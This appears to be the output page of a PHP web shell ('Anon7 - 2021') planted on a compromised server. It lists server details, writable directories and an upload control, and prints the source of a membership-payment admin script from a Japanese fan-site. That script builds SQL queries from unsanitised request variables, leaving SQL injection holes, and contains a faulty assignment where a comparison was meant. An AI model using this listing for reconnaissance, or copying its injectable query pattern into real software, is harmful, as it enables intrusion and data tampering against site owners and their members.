KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /home/queenjbs/jaejoong_X/admin/Proc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/queenjbs/jaejoong_X/admin/Proc/price_proc.php
<?include "$DOCUMENT_ROOT/conf/conf_dir.php";?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?
$table_names = "user_cash";

if($idx){
	if($mode == D){
		$benddate = get_db("SELECT enddate FROM user_cash where user_id='$midx' and flag='D' order by id desc");
		if($benddate){
			$end_arr = explode("-",$benddate);
			$end_time = mktime(0,0,0,$end_arr[1], $end_arr[2], $end_arr[0]);
			$now_time = mktime(0,0,0,date("m"), date("d"), date("Y"));
			$giganCount = ($end_time - $now_time)/86400;
		}else{
			$giganCount =0;
		}
		if($giganCount >= 1){
			#유료회원 기간이 남아있다면.. enddate의 날짜에 기간 플러스함.
			$end_arr = explode("-",$benddate);
			$tmpyearn = $end_arr[0];
			$tmpyearp=$end_arr[0]+1;
			$tmp_start_date = $tmpyearn."-".$end_arr[1]."-".$end_arr[2];
			$tmp_end_date = $tmpyearp."-".$end_arr[1]."-".$end_arr[2];
			$whereDate1 =",startdate='$tmp_start_date',enddate='$tmp_end_date'";
			$whereDate2 =",m_startdate='$tmp_start_date',m_enddate='$tmp_end_date'";

		}else{
			#유료회원 기간이 없다면.. 입금완료일의 날짜로 기간 플러스함.
			
			
			#2016년은 윤달로 1일 추가 해줘야함.+365 ->+366
			$whereDate1 =",startdate=now(),enddate=date_add(now(), interval +366 day)";
			$whereDate2 =",m_startdate=now(),m_enddate=date_add(now(), interval +366 day)";
		}

		//회원번호가 있다면 그대로 쓰기..20150502
		if($mCode==0 || $mCode=="")$member_code  = get_db("select max(member_code) from user where activated = 1")+1; //정회원번호주기
		else $member_code=$mCode;
		//캐쉬 결제
		$adminIP = $_SERVER["REMOTE_ADDR"];
		$cash_cnt = get_db("SELECT count(user_id) FROM user_cash where user_id='$midx' and flag='D'")+1;
		$queryupok = "update $table_names set flag = '$mode' ,inning='$cash_cnt',admin_id='$HTTP_SESSION_VARS[S_ID]' ,admin_date=now() , admin_ip='$adminIP' $whereDate1 where id = '$idx'";
		$queryupok_result = mysql_query($queryupok,$db_con);
		
		//member table 결재 정보 수정
		$queryupok = "update user set auth_code = '10',cash_chk='$idx',cash_cnt='$cash_cnt' $whereDate2 ,member_code='$member_code' where id = '$midx'";
		$queryupok_result = mysql_query($queryupok,$db_con);
		/*
		/*
		//module_name 2 jyj, mode 2- 정회원 가입 정보 메일
		$mail_qry = Get_dbres("SELECT * FROM user where id='$idx'");
		$row = mysql_fetch_array($mail_qry);

		$mail_qry		= "SELECT * FROM mail_form where module_name = 2 and mode = 2";
		$mresult	= mysql_query($mail_qry,$db_con);
		$rows		= mysql_fetch_array($mresult);
		
		$message = $row[jname2]."様<br>";
		//$message .= "会員番号 : ".$row[member_code]."<br>";
		$message .= "会員期間 : ".$row[m_startdate]."~".$row[m_enddate]."<br>";
		$message .= $rows[contents];

		$to_email = $row[email]; //받는사람

		$title = $rows[subject];
		$from_email = $rows[from_email];
		$from_name = $rows[from_email]; //송신자 명
		
		$from .= "From: JYJ Japan Official Website<".$from_email.">\n";
		$from .= "Return-Path: <".$from_email.">\n";
		$from .= "Content-Type: text/html; charset=UTF-8";
		$enc = iconv("UTF-8", "ISO-2022-JP", $title);
		$subject = "=?ISO-2022-JP?B?".base64_encode($enc) ."?=";
		//mail("$to_email", "$subject", "$message", "$from");
		*/
	}else if($mode='A'){
		//캐쉬 결제
		$queryupok = "update $table_names set flag = '$mode' ,inning='',startdate='',enddate='',admin_id='',admin_date='' where id = '$idx'";
		$queryupok_result = mysql_query($queryupok,$db_con);
		
		//이전 결제 처리
		$beforeCash = Get_dbres("select * from $table_names where flag = 'D' and user_id = '$midx' order by id desc");
		$row = mysql_fetch_array($beforeCash);
		if($row[id] && $today < $row[enddate]){
			$auth_code = 10;
			$cash_chk = $row[id];
			$m_startdate = $row[startdate];
			$m_enddate = $row[enddate];
		}else{
			$auth_code = 3;
			$cash_chk = "";
			$m_startdate = "";
			$m_enddate = "";
		}
		
		$member_code  = get_db("select member_code from user where id = '$midx'");

		//member table 결재 정보 수정
		$queryupok = "update user set auth_code = '$auth_code',cash_chk='$cash_chk',m_startdate='$m_startdate',m_enddate='$m_enddate' ,member_code='$member_code' where id = '$midx'";
		$queryupok_result = mysql_query($queryupok,$db_con);
		
	}
		
		$pathURL="../memberlist1.php?act=4";
	}else{
		$pathURL="../memberlist.php?act=1";
	}
?>
<script>
alert("保存しました.");
parent.location.href = "<?=$pathURL?>";
</script>

Anon7 - 2021